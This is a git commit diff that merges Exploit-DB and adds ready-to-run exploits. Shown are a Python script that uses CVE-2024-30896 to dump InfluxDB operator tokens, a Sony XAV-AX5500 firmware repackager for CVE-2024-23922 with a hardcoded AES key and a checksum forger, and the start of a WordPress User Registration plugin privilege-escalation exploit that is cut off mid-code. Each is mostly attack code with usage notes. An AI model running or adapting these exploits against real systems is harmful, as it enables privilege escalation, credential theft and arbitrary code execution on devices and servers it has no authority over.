Merge remote-tracking branch 'exploitdb/main'
This commit is contained in:
commit
6a8464a842
9 changed files with 1114 additions and 0 deletions
221
exploits/multiple/remote/52142.py
Executable file
221
exploits/multiple/remote/52142.py
Executable file
|
@ -0,0 +1,221 @@
|
|||
# Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw
|
||||
# Date: 22/03/2024
|
||||
# Exploit Author: Andrea Pasin (Xenom0rph97)
|
||||
# Researcher Homepage: https://xenom0rph97.github.io/xeno/
|
||||
# GitHub Exploit repo: https://github.com/XenoM0rph97/CVE-2024-30896
|
||||
# Software Link: https://www.influxdata.com/products/influxdb/
|
||||
# Version: 2.x <=> 2.7.11
|
||||
# Tested on: InfluxDB OSS 2.x
|
||||
# CVE: CVE-2024-30896
|
||||
# CVSS Base Score: 9.1
|
||||
# CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
|
||||
|
||||
# CVE-2024-30896
|
||||
|
||||
## Summary
|
||||
A business logic flaw in influxdb allows users who own a valid allAccess
|
||||
token to escalate their privileges at operator level by listing current
|
||||
authorization tokens.
|
||||
|
||||
## Scenario
|
||||
Attacker might be a user which was gained access by an administrator via an
|
||||
allAccess token only within their organization.
|
||||
This user's permissions will allow full control over the organization but
|
||||
will still prevent him to interact with other orgs.
|
||||
|
||||
## Impact
|
||||
This vulnerability would allow a user to obtain unrestricted access to the
|
||||
influxdb instance. A similar condition might fully compromise
|
||||
Confidentiality, Integrity and Availability of data owned by users of
|
||||
different organizations. Additionally, since operator token has
|
||||
administrative permissions, Availability and Integrity of the entire
|
||||
influxdb instance might be compromised.
|
||||
|
||||
## Prerequisites/Limitations
|
||||
1. Attacker must have a valid allAccess token
|
||||
2. allAccess token must have been created in the same Org where an operator
|
||||
token resides (ex. same Org as Admin user)
|
||||
3. Attacker must be able to interact with influxdb instance via CLI or APIs
|
||||
(influxClient)
|
||||
|
||||
## Steps to Reproduce
|
||||
### Case 1: Exploitation via influxdb APIs:
|
||||
*Python Version*: 3
|
||||
*Requirements*: `influxdb_client==1.41.0`
|
||||
*Script usage*
|
||||
```
|
||||
% python3 ./CVE-2024-30896.py -h
|
||||
usage: CVE-2024-30896.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]]
|
||||
[-vv [VVERBOSE]]
|
||||
|
||||
optional arguments:
|
||||
-h, --help show this help message and exit
|
||||
-t TOKEN, --token TOKEN
|
||||
Custom or allAccess token to access influx DB
|
||||
instance
|
||||
-e ENDPOINTURL, --endpointUrl ENDPOINTURL
|
||||
Endpoint Url of influxdb instance (ex. "
|
||||
https://myInfluxdbInstance:8086/")
|
||||
-v [VERBOSE], --verbose [VERBOSE]
|
||||
Enable verbose logging - INFO
|
||||
-vv [VVERBOSE], --vverbose [VVERBOSE]
|
||||
Enable verbose logging - DEBUG
|
||||
```
|
||||
|
||||
### Case 2: Exploitation via influx CLI
|
||||
1. Execute: `influx auth ls -t <allAccessToken> | grep write:/orgs`. This
|
||||
will list all current active operator tokens on the influxdb instance.
|
||||
|
||||
*Example*
|
||||
```
|
||||
# Using an allAccess token
|
||||
influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}
|
||||
|
||||
0cc41c3b050e5000 U1OuqmFC{REDACTED}
|
||||
admin 0cb9c92ee228b000 [read:orgs/87d0746948a3b3f5/authorizations
|
||||
write:orgs/87d0746948a3b3f5/authorizations
|
||||
read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets
|
||||
read:orgs/87d0746948a3b3f5/dashboards
|
||||
write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5
|
||||
read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources
|
||||
read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks
|
||||
read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs
|
||||
read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000
|
||||
read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables
|
||||
read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers
|
||||
read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets
|
||||
read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels
|
||||
read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views
|
||||
read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents
|
||||
read:orgs/87d0746948a3b3f5/notificationRules
|
||||
write:orgs/87d0746948a3b3f5/notificationRules
|
||||
read:orgs/87d0746948a3b3f5/notificationEndpoints
|
||||
write:orgs/87d0746948a3b3f5/notificationEndpoints
|
||||
read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks
|
||||
read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp
|
||||
read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks
|
||||
read:orgs/87d0746948a3b3f5/annotations
|
||||
write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes
|
||||
write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications
|
||||
write:orgs/87d0746948a3b3f5/replications]
|
||||
|
||||
# Listing all available tokens passing allAccess token and retrieving only
|
||||
operator level tokens
|
||||
influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs
|
||||
|
||||
0cbb920e128e5000 gerKYLO0Ph_ibUk0y{REDACTED}
|
||||
admin 0cb9c92ee228b000 [read:/authorizations write:/authorizations
|
||||
read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs
|
||||
write:/orgs read:/sources write:/sources read:/tasks write:/tasks
|
||||
read:/telegrafs write:/telegrafs read:/users write:/users read:/variables
|
||||
write:/variables read:/scrapers write:/scrapers read:/secrets
|
||||
write:/secrets read:/labels write:/labels read:/views write:/views
|
||||
read:/documents write:/documents read:/notificationRules
|
||||
write:/notificationRules read:/notificationEndpoints
|
||||
write:/notificationEndpoints read:/checks write:/checks read:/dbrp
|
||||
write:/dbrp read:/notebooks write:/notebooks read:/annotations
|
||||
write:/annotations read:/remotes write:/remotes read:/replications
|
||||
write:/replications]
|
||||
|
||||
influxdb_client==1.41.0
|
||||
|
||||
import influxdb_client
|
||||
import argparse
|
||||
import logging
|
||||
import sys
|
||||
|
||||
argParser = argparse.ArgumentParser()
|
||||
argParser.add_argument("-t", "--token", type=str, help="Custom or allAccess token to access influx DB instance")
|
||||
argParser.add_argument("-e", "--endpointUrl", type=str, help="Endpoint Url of influxdb instance (ex. \"https://myInfluxdbInstance:8086/\")")
|
||||
argParser.add_argument("-v", "--verbose", type=bool, const=True, nargs='?', help="Enable verbose logging - INFO")
|
||||
argParser.add_argument("-vv", "--vverbose", type=bool, const=True, nargs='?', help="Enable verbose logging - DEBUG")
|
||||
|
||||
args = argParser.parse_args()
|
||||
|
||||
# Using user retrieved values or default (hardcoded) ones
|
||||
all_access_token = "<allAccessToken>"
|
||||
influx_endpoint_url = "<influxdbEndpointUrl>"
|
||||
|
||||
# Defining some colors
|
||||
red = "\033[31m"
|
||||
yellow = "\033[93m"
|
||||
purple = "\33[1;95m"
|
||||
green = "\033[0;92m"
|
||||
cyan = "\033[96m"
|
||||
bold ="\033[1m"
|
||||
endc = "\033[39m"
|
||||
|
||||
if args.vverbose == True:
|
||||
logging.basicConfig(level=logging.DEBUG)
|
||||
elif args.verbose == True:
|
||||
logging.basicConfig(level=logging.INFO)
|
||||
|
||||
logger = logging.getLogger()
|
||||
|
||||
if args.token:
|
||||
token = args.token
|
||||
else:
|
||||
logger.debug(f"{yellow}User did not set a token, using default one{endc}")
|
||||
token = all_access_token
|
||||
|
||||
if args.endpointUrl:
|
||||
endpointUrl = args.endpointUrl
|
||||
else:
|
||||
logger.debug(f"{yellow}User did not set an endpoint Url for influxdb, using default one{endc}")
|
||||
endpointUrl = influx_endpoint_url
|
||||
|
||||
logger.info(f"{cyan}Connecting to influx DB instance{endc}")
|
||||
# Connecting to influxdb instance
|
||||
try:
|
||||
conn = influxdb_client.InfluxDBClient(
|
||||
url=endpointUrl,
|
||||
token=token,
|
||||
debug=False,
|
||||
verify_ssl=True
|
||||
)
|
||||
|
||||
# Verify InfluxDB connection
|
||||
health = conn.ping()
|
||||
if not health:
|
||||
logger.error(f"{red}Unable to connect to db instace " + endpointUrl + f"{endc}")
|
||||
print(f"{red}Quitting execution...{endc}")
|
||||
sys.exit(1)
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"{red}Failed to connect to db instance: " + endpointUrl + " Error: " + str(e) + f"{endc}")
|
||||
print(f"{red}Quitting execution...{endc}")
|
||||
sys.exit(1)
|
||||
|
||||
# Retrieving all current auths
|
||||
logger.debug(f"{yellow}Retrieving all auth tokens{endc}")
|
||||
print(f"{cyan}Enumerating current authorizations...{endc}")
|
||||
try:
|
||||
auths = conn.authorizations_api().find_authorizations()
|
||||
except Exception as e:
|
||||
logger.error(f"{red}Unable to retrieve authorizations. ERR: " + str(e) +f"{endc}")
|
||||
print(f"{red}Unable to retrieve authorizations. Quitting...{endc}")
|
||||
sys.exit(1)
|
||||
if not auths:
|
||||
print(f"{cyan}No Authorization tokens found on the instance{endc}")
|
||||
sys.exit(1)
|
||||
print(f"{cyan}{str(len(auths))} tokens found on the instance{endc}\n")
|
||||
# Extracting operator token -> Parsing permissions to look for ("org = None" and "authType = write/auths"), not 100% efficiency -> TO OPTIMIZE
|
||||
logger.debug(f"{yellow}Parsing auth permissions to retrieve operator tokens{endc}")
|
||||
print(f"{cyan}Enumerating all operator tokens:{endc}")
|
||||
op_tokens = []
|
||||
# In order to understand if a token is of type "operator" we need to enumerate all permissions and look for "write/auths" on org 'None' -> Unrescticted access
|
||||
try:
|
||||
for auth in auths:
|
||||
if auth.permissions:
|
||||
for perm in auth.permissions:
|
||||
if perm.action == "write" and perm.resource.org == None and perm.resource.type == "authorizations":
|
||||
op_tokens.append(auth.token)
|
||||
except Exception as e:
|
||||
logger.error(f"{red}Unable to parse permissions on found authorizations. ERR: " + str(e) + f"{endc}")
|
||||
print(f"{red}Unable to parse permissions on found authorizations. Quitting execution...{endc}")
|
||||
sys.exit(1)
|
||||
|
||||
logger.info(f"{cyan}Printing all operator auth tokens{endc}")
|
||||
print(f"{cyan}{str(len(op_tokens))} operator tokens found.\n\nListing all operator tokens:\n{endc}")
|
||||
for op_t in op_tokens:
|
||||
print(f"{green}{op_t}{endc}")
|
355
exploits/multiple/remote/52143.py
Executable file
355
exploits/multiple/remote/52143.py
Executable file
|
@ -0,0 +1,355 @@
|
|||
# Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution
|
||||
# Date: 11-Feb-2025
|
||||
# Exploit Author: lkushinada
|
||||
# Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500
|
||||
# Software Link: https://archive.org/details/xav-ax-5500-v-113
|
||||
# Version: 1.13
|
||||
# Tested on: Sony XAV-AX5500
|
||||
# CVE : CVE-2024-23922
|
||||
|
||||
# From NIST CVE Details:
|
||||
# ====
|
||||
# This vulnerability allows physically present attackers to execute arbitrary code on affected
|
||||
# installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this
|
||||
# vulnerability. The specific flaw exists within the handling of software updates. The issue
|
||||
# results from the lack of proper validation of software update packages. An attacker can leverage
|
||||
# this vulnerability to execute code in the context of the device.
|
||||
# Was ZDI-CAN-22939
|
||||
# ====
|
||||
|
||||
# # Summary
|
||||
# Sony's firmware validation for a number of their XAV-AX products relies on symetric cryptography,
|
||||
# obscurity of their package format, and a weird checksum method instead of any real firmware
|
||||
# signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation
|
||||
# and allow a USB-based attacker to obtain RCE on the infotainment unit.
|
||||
|
||||
# What's not mentioned in the CVE advisories, is that this method works on the majority of Sony's
|
||||
# infotainment units and products which use a similar chipset or firmware package format. Tested
|
||||
# to work on most firmware versions prior to v2.00.
|
||||
|
||||
# # Threat Model
|
||||
# An attacker with physical access to an automotive media unit can typically utilize other methods
|
||||
# to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post
|
||||
# is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar
|
||||
# manner? if they are, how trivial is it to bypass?
|
||||
|
||||
# # Disclaimer
|
||||
# The information in this article is for educational purposes only.
|
||||
# Tampering with an automotive system comes with risks which, if you don't understand, you should
|
||||
# not be undertaking.
|
||||
# THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING
|
||||
# FROM THE USE OF ANYTHING IN THIS DOCUMENT.
|
||||
|
||||
|
||||
# # The Unit
|
||||
# ## Processors
|
||||
# - DAC
|
||||
# - System Management Controller (SMC)
|
||||
# - Applications Processor
|
||||
# - Display Processor
|
||||
|
||||
# Coming from a mobile and desktop computer environment, one may be use to thinking about
|
||||
# the Applications Processor as the most powerful chip in the system in terms of processing power,
|
||||
# size, power consumption, and system hierarchy. The first oddity of this platform is that the
|
||||
# application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the
|
||||
# board.
|
||||
|
||||
# The application processor does not appear to be the orchestrator of the components on the system.
|
||||
# The SMC tkes which takes the role of watchdog, power state management, and input (think remote
|
||||
# controls, steering wheel button presses) routing.
|
||||
# For our purposes, it is the Applications processor we're interested in, as it is
|
||||
# the system responsible for updating the unit via USB.
|
||||
|
||||
# ## Interfaces
|
||||
# We're going to be attacking the unit via USB, as it's the most readily exposed
|
||||
# interface to owners and would-be attackers.
|
||||
# Whilst the applications processor does have a UART interface, the most recent iterations of the
|
||||
# unit do not expose any headers for debugging via UART, and the one active UART line found to be
|
||||
# active was for message passing between the SMC and app processor, not debug purposes. Similarly, no
|
||||
# exposed JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's
|
||||
# documentation suggests these are not enabled, but this could not be verified during testing. At the
|
||||
# very least, JTAG was not found to be exposed on an accessible interface.
|
||||
|
||||
# ## Storage
|
||||
# The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This
|
||||
# firmware was RARd. The contents of SPI flash was analyzed to determine many of the details
|
||||
# discussed in this report.
|
||||
|
||||
# ## The Updater
|
||||
# Updates are provided on Sony's support website. A ZIP package is provided with three files:
|
||||
# - SHDS1132.up6
|
||||
# - SHMC1132.u88
|
||||
# - SHSO1132.fir
|
||||
# The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted.
|
||||
# The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and
|
||||
# SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest:
|
||||
|
||||
# 00002070 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
|
||||
# *
|
||||
# 00002860 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
|
||||
|
||||
# 00744110 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
|
||||
# *
|
||||
# 00800020 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
|
||||
|
||||
|
||||
# ## SPI Flash
|
||||
# Dumping the contents of the SPI flash shows a similar layout, with slightly different offsets:
|
||||
# 00001fe0 10 10 10 10 10 10 10 10 ff ff ff ff ff ff ff ff |................|
|
||||
# 00001ff0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
|
||||
# *
|
||||
# 000027f0 ff ff ff ff ff ff ff ff ff ff ff ff 00 03 e7 52 |...............R|
|
||||
# 00002800 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
|
||||
#
|
||||
# 0007fff0 ff ff ff ff ff ff ff ff ff ff ff ff 00 6c 40 8b |.............l@.|
|
||||
# 00080000 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
|
||||
# ...
|
||||
# 00744090 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
|
||||
# *
|
||||
# 00778000
|
||||
#
|
||||
# This given the offsets and spacing, we suspect that the .FIR matches the contents of the SPI.
|
||||
# Decompressing the RARs at the 0x2800 and 0x80000, we get the recovery and main applications.
|
||||
|
||||
# Once we remove the packaging bytes, seeing that the repetive patterns align with FF's, gives
|
||||
# us a strong indication the encryption function is operating in an ECB-style configuration,
|
||||
# giving us an avenue, even if we do not recover the key, to potentially make modifications
|
||||
# to the firmware depending on how the checksum is being calculated.
|
||||
|
||||
# ## Firmware
|
||||
# The recovery application contains the decompression, decryption and checksum methods.
|
||||
# Putting the recovery_16.bin into ghidra and setting the memory map to load us in at 0x2800,
|
||||
# we start taking a look at the relevant functions by way of:
|
||||
# - looking for known strings (KRSELCO)
|
||||
# - analyizing the logic and looking for obvious "if this passed, begin the update, else fail"
|
||||
# - looking for things that look like encryption (loads of bitshifting math in one function)
|
||||
# Of interest to us, there is:
|
||||
# - 0x0082f4 - a strcmp between KRSELCO and the address the incoming firmware update is at, plus 0x10
|
||||
# - 0x00897a - a function which sums the total number of bytes until we hit 0xA5A5A5A5
|
||||
# - 0x02d4ce - the AES decryption function
|
||||
# - 0x040dd4 - strcmp (?)
|
||||
# - 0x040aa4 - memcpy (?)
|
||||
# - 0x046490 - the vendor plus the a number an idiot would use for their luggage, followed by enough
|
||||
# padding zeros to get us to a 16 byte key
|
||||
|
||||
# This gives us all the information we need, other than making some guesses as to the general package
|
||||
# and header layout of the update package, to craft an update packager that allows arbitrary
|
||||
# modification of the firmware.
|
||||
|
||||
# # Proof of Concept
|
||||
# The PoC below will take an existing USB firmware update, decrypt and extract the main binary,
|
||||
# pause whilst you make modifications (e.g. changing the logic or modifying a message), and repackage
|
||||
# the update.
|
||||
|
||||
# ## Requirements
|
||||
# - Unixish system
|
||||
# - WinRar 2.0 (the version the Egyptians built the pyramids with)
|
||||
|
||||
# ## Usage
|
||||
# cve-2024-23922.py path_to_winrar source.fir output.fir
|
||||
|
||||
import argparse
|
||||
import sys
|
||||
import os
|
||||
import tempfile
|
||||
import shutil
|
||||
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
|
||||
from cryptography.hazmat.backends import default_backend
|
||||
|
||||
# Filenames as found in the .FIR
|
||||
MAIN_BINARY_NAME="main_16.bin"
|
||||
MAIN_RAR_NAME="main_16.rar"
|
||||
DECRYPTED_FILE_NAME="decrypt.bin"
|
||||
ENCRYPTED_FILE_NAME="encrypt.bin"
|
||||
|
||||
# Offsets in the .FIR
|
||||
HEADER_LENGTH=0x80
|
||||
RECOVERY_OFFSET=0x2800
|
||||
MAIN_OFFSET=0x80000
|
||||
CHECKSUM_OFFSET=0x800000-0x10
|
||||
CHECKSUM_SIZE=0x4
|
||||
RAR_LENGTH_OFFSET=0x4
|
||||
RAR_LENGTH_SIZE=0x4
|
||||
|
||||
# From 0x46490 in recovery_16.bin
|
||||
ENCRYPTION_KEY=b'\x54\x41\x4d\x55\x4c\x31\x32\x33\x34\x00\x00\x00\x00\x00\x00\x00'
|
||||
|
||||
def decrypt_file(input_file, output_file):
|
||||
backend = default_backend()
|
||||
cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
|
||||
decryptor = cipher.decryptor()
|
||||
|
||||
with open(input_file, 'rb') as file:
|
||||
ciphertext = file.read()
|
||||
|
||||
# Strip the unencrypted header
|
||||
ciphertext = ciphertext[HEADER_LENGTH:]
|
||||
|
||||
decrypted_data = decryptor.update(ciphertext) + decryptor.finalize()
|
||||
|
||||
with open(output_file, 'wb') as file:
|
||||
file.write(decrypted_data)
|
||||
|
||||
def aes_encrypt_file(input_file, output_file):
|
||||
backend = default_backend()
|
||||
cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
|
||||
encryptor = cipher.encryptor()
|
||||
|
||||
with open(input_file, 'rb') as file:
|
||||
plaintext = file.read()
|
||||
|
||||
ciphertext = encryptor.update(plaintext) + encryptor.finalize()
|
||||
|
||||
with open(output_file, 'wb') as file:
|
||||
file.write(ciphertext)
|
||||
|
||||
def get_sony_32(data):
|
||||
csum = int()
|
||||
for i in data:
|
||||
csum = csum + i
|
||||
return csum % 2147483648 # 2^31
|
||||
|
||||
def validate_args(winrar_path, source_file, destination_file):
|
||||
# Check if the WinRAR executable exists and is a file
|
||||
if not os.path.isfile(winrar_path) or not os.access(winrar_path, os.X_OK):
|
||||
print(f"[x] Error: The specified WinRAR path '{winrar_path}' is not a valid executable.")
|
||||
sys.exit(1)
|
||||
|
||||
# Check if the source file exists
|
||||
if not os.path.isfile(source_file):
|
||||
print(f"[x] Error: The specified source file '{source_file}' does not exist.")
|
||||
sys.exit(1)
|
||||
|
||||
# Read 8 bytes from offset 0x10 in the source file
|
||||
try:
|
||||
with open(source_file, 'rb') as f:
|
||||
f.seek(0x10)
|
||||
signature = f.read(8)
|
||||
if signature != b'KRSELECO':
|
||||
print(f"[x] Error: The source file '{source_file}' does not contain the expected signature.")
|
||||
sys.exit(1)
|
||||
except Exception as e:
|
||||
print(f"[x] Error: Failed to read from '{source_file}': {e}")
|
||||
sys.exit(1)
|
||||
|
||||
# Check if the destination file already exists
|
||||
if os.path.exists(destination_file):
|
||||
print(f"[x] Error: The destination file '{destination_file}' already exists.")
|
||||
sys.exit(1)
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="CVE-2024-23922 Sony XAV-AX5500 Firmware Modifier")
|
||||
parser.add_argument("winrar_path", help="Path to WinRAR 2.0 executable (yes, the ancient one)")
|
||||
parser.add_argument("source_file", help="Path to original .FIR file")
|
||||
parser.add_argument("destination_file", help="Path to write the modified .FIR file to")
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
validate_args(args.winrar_path, args.source_file, args.destination_file)
|
||||
RAR_2_PATH = args.winrar_path
|
||||
GOOD_FIRMWARE_FILE = args.source_file
|
||||
DESTINATION_FIRMWARE_FILE = args.destination_file
|
||||
|
||||
# make temporary directory
|
||||
workdir = tempfile.mkdtemp(prefix="sony_firmware_modifications")
|
||||
|
||||
# copy the good firmware file into the temp directory
|
||||
temp_fir_file = os.path.join(workdir, os.path.basename(GOOD_FIRMWARE_FILE))
|
||||
shutil.copyfile(GOOD_FIRMWARE_FILE, temp_fir_file)
|
||||
|
||||
print("[+] Cutting the head off and decrypting the contents")
|
||||
decrypted_file_path = os.path.join(workdir, DECRYPTED_FILE_NAME)
|
||||
decrypt_file(input_file=temp_fir_file, output_file=decrypted_file_path)
|
||||
|
||||
print("[+] Dump out the rar file")
|
||||
with open(decrypted_file_path, 'rb') as file:
|
||||
# right before the rar file there is a 4 byte length header for the rar file. get that.
|
||||
file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
|
||||
original_rar_length = int.from_bytes(file.read(RAR_LENGTH_SIZE), "big")
|
||||
rar_file_bytes = file.read(original_rar_length)
|
||||
|
||||
# now dump that out
|
||||
rar_file_path=os.path.join(workdir, MAIN_RAR_NAME)
|
||||
with open(rar_file_path, 'wb') as rarfile:
|
||||
rarfile.write(rar_file_bytes)
|
||||
|
||||
# check that the stat of the file matches what the header told us
|
||||
dumped_rar_size = os.stat(rar_file_path).st_size
|
||||
if dumped_rar_size != original_rar_length:
|
||||
print("[!] extracted filesizes dont match, there may be corruption", dumped_rar_size, original_rar_length)
|
||||
|
||||
print("[+] Extracting the main binary from the rar file")
|
||||
os.system("unrar x " + rar_file_path + " " + workdir)
|
||||
|
||||
print("[!] Okay, I'm now going to wait until you have had a chance to make modifications")
|
||||
print("Please modify this file:", os.path.join(workdir, MAIN_BINARY_NAME))
|
||||
input()
|
||||
|
||||
print("[+] Continuing")
|
||||
print("[+] Putting your main binary back into the rar file")
|
||||
os.system("wine " + RAR_2_PATH + " u -tk -ep " + rar_file_path + " " + workdir + "/" + MAIN_BINARY_NAME)
|
||||
|
||||
# we could fix this by writing some FFs
|
||||
new_rar_size=os.stat(rar_file_path).st_size
|
||||
if dumped_rar_size > os.stat(rar_file_path).st_size:
|
||||
print("[!!] The rar size is smaller than the old one. This might cause a problem.")
|
||||
print("[!!] Push any key to continue, ctrl+c to abort")
|
||||
input()
|
||||
|
||||
with open(decrypted_file_path, 'r+b') as file:
|
||||
# right before the rar file there is a 4 byte length header for the rar file. go back there
|
||||
file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
|
||||
|
||||
# overwrite the old size with the new size
|
||||
file.write(new_rar_size.to_bytes(RAR_LENGTH_SIZE, "big"))
|
||||
|
||||
print("[+] Deleting the old rar from the main container")
|
||||
# delete the old rar from the main container by FFing it up
|
||||
file.write(b'\xFF'*original_rar_length)
|
||||
|
||||
# seek back to the start
|
||||
file.seek(MAIN_OFFSET)
|
||||
|
||||
print("[+] Loading the new rar back into the main container")
|
||||
with open(rar_file_path, 'rb') as rarfile:
|
||||
new_rarfile_bytes = rarfile.read()
|
||||
file.write(new_rarfile_bytes)
|
||||
|
||||
print("[+] Updating Checksum")
|
||||
with open(decrypted_file_path, 'rb') as file:
|
||||
contents = file.read()
|
||||
|
||||
contents = contents[:-0x0010]
|
||||
s32_sum = get_sony_32(contents)
|
||||
|
||||
with open(decrypted_file_path, 'r+b') as file:
|
||||
file.seek(CHECKSUM_OFFSET)
|
||||
# read out the current checksum
|
||||
old_checksum_bytes=file.read(CHECKSUM_SIZE)
|
||||
print("old checksum:", int.from_bytes(old_checksum_bytes, "big"), old_checksum_bytes)
|
||||
|
||||
# go back and update it with new checksum
|
||||
print("new checksum:", s32_sum, hex(s32_sum))
|
||||
new_checksum_bytes=s32_sum.to_bytes(CHECKSUM_SIZE, "big")
|
||||
file.seek(CHECKSUM_OFFSET)
|
||||
file.write(new_checksum_bytes)
|
||||
|
||||
print("[+] Encrypting the main container back up")
|
||||
encrypted_file_path = os.path.join(workdir, ENCRYPTED_FILE_NAME)
|
||||
aes_encrypt_file(decrypted_file_path, encrypted_file_path)
|
||||
|
||||
print("[+] Reattaching the main container to the header and writing to dest")
|
||||
with open(DESTINATION_FIRMWARE_FILE, 'wb') as file:
|
||||
with open(temp_fir_file, 'rb') as firfile:
|
||||
header = firfile.read(HEADER_LENGTH)
|
||||
file.write(header)
|
||||
with open(encrypted_file_path, 'rb') as encfile:
|
||||
enc_contents = encfile.read()
|
||||
file.write(enc_contents)
|
||||
|
||||
print("[+] DONE!!! Any key to delete temp files, ctrl+c to keep them.")
|
||||
input()
|
||||
shutil.rmtree(workdir)
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
126
exploits/multiple/webapps/52137.txt
Normal file
126
exploits/multiple/webapps/52137.txt
Normal file
|
@ -0,0 +1,126 @@
|
|||
# Exploit Title: WordPress User Registration & Membership Plugin <= 4.1.1 - Unauthenticated Privilege Escalation
|
||||
# Exploit Author: Al Baradi Joy
|
||||
# Date: 2025-04-07
|
||||
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
|
||||
# Software Link:
|
||||
https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip
|
||||
# Version: <= 4.1.1
|
||||
# Tested on: WordPress 6.4.3
|
||||
# CVSS: 9.8 (CRITICAL)
|
||||
# CWE: CWE-269
|
||||
# References:
|
||||
# https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
|
||||
# https://patchstack.com/database/wordpress/plugin/user-registration/vulnerability/wordpress-user-registration-membership-plugin-4-1-2-unauthenticated-privilege-escalation-vulnerability
|
||||
# https://nvd.nist.gov/vuln/detail/CVE-2025-2563
|
||||
|
||||
import re
|
||||
import json
|
||||
import requests
|
||||
import random
|
||||
import string
|
||||
from urllib.parse import urljoin
|
||||
|
||||
def banner():
|
||||
print("\n[+] CVE-2025-2563 - WP User Registration Privilege Escalation")
|
||||
print("[+] Made By Al Baradi Joy\n")
|
||||
|
||||
def randstring(n=8):
|
||||
return ''.join(random.choices(string.ascii_lowercase, k=n))
|
||||
|
||||
def get_regex(content, pattern, group=1, name=""):
|
||||
match = re.search(pattern, content)
|
||||
if not match:
|
||||
raise ValueError(f"[-] Could not extract {name} (Pattern:
|
||||
{pattern})")
|
||||
return match.group(group)
|
||||
|
||||
def exploit(target):
|
||||
session = requests.Session()
|
||||
username = randstring()
|
||||
password = randstring() + "!@"
|
||||
email = f"{username}@exploit.test"
|
||||
|
||||
try:
|
||||
print("[+] Getting registration page...")
|
||||
r = session.get(urljoin(target, "/membership-registration/"),
|
||||
timeout=10)
|
||||
r.raise_for_status()
|
||||
page = r.text
|
||||
|
||||
nonce = get_regex(page,
|
||||
r'"user_registration_form_data_save":"(.*?)"', name="nonce")
|
||||
formid = get_regex(page, r"id='user-registration-form-([0-9]+)'",
|
||||
name="formid")
|
||||
memval = get_regex(page,
|
||||
r'id="ur-membership-select-membership-([0-9]+)', name="membership value")
|
||||
memname = get_regex(page,
|
||||
r'data-field-id="membership_field_([0-9]+)"', name="membership field name")
|
||||
front_nonce = get_regex(page, r'name="ur_frontend_form_nonce"
|
||||
value="(.*?)"', name="frontend_nonce")
|
||||
loc_nonce = get_regex(page, r'ur_membership_frontend_localized_data
|
||||
= {"_nonce":"(.*?)"', name="localized_frontend_nonce")
|
||||
|
||||
print("[+] Submitting registration form...")
|
||||
form_data = [
|
||||
{"field_name": "user_login", "value": username, "field_type":
|
||||
"text", "label": "Username"},
|
||||
{"field_name": "user_email", "value": email, "field_type":
|
||||
"email", "label": "User Email"},
|
||||
